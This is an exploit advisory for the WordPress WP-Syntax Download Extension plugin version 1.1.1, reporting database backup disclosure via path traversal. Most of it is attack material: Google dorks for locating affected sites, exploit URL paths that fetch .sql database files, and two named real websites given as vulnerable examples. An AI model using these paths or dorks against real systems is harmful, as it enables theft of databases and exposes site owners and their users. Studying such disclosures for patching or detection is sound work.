WordPress WP-Syntax Download Extension plugin version 1.1.1 suffers from a database disclosure vulnerability.
55980352873270b0fe06cdd22db21802
#################################################################################
# Exploit Title : WordPress WP-Syntax Download Extension Plugins 1.1.1
Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 06/12/2018
# Vendor Homepage : wordpress.org/plugins/wp-syntax-download-extension/
+ blog.akinori.org/2010/03/26/wp-syntax-download-extension/
# Software Download Link :
downloads.wordpress.org/plugin/wp-syntax-download-extension.1.1.1.zip
+ github.com/knu/wp-syntax-download-extension/archive/master.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0 and 1.1.1
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/wp-syntax-download-extension/''
+ intext:''Theme by Altis. Proudly powered by WordPress''
+ intext:''Made with Love by Graphene Themes''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/plugins/wp-syntax-download-extension/wp-syntax-download-extension.php/.......
/wp-content/plugins/wp-syntax-download-extension/wp-syntax-download-extension.php/
[RANDOM-NUMBERS-HERE]/hello.sql
/wp-content/plugins/wp-syntax-download-extension/wp-syntax-download-extension.php/
1439/hello.sql
/wp-content/plugins/wp-syntax-download-extension/wp-syntax-download-extension.php/
1439/[RANDOM-DATABASE-NAME.sql]
/wordpress/wp-content/plugins/wp-syntax-download-extension/wp-syntax-download-extension.php/
[RANDOM-NUMBERS-HERE]/1-AllApps-prio-and-appname.sql
/wordpress/wp-content/plugins/wp-syntax-download-extension/wp-syntax-download-extension.php/
[RANDOM-NUMBERS-HERE]/[RANDOM-DATABASE-NAME.sql]
#################################################################################
# Example Vulnerable Site =>
[+] cx20.main.jp/blog/hello/wp-content/plugins/wp-syntax-download-extension/
wp-syntax-download-extension.php/1439/hello.sql
[+] vroom.cc/wordpress/wp-content/plugins/wp-syntax-download-extension/
wp-syntax-download-extension.php/175/1-AllApps-prio-and-appname.sql
#################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################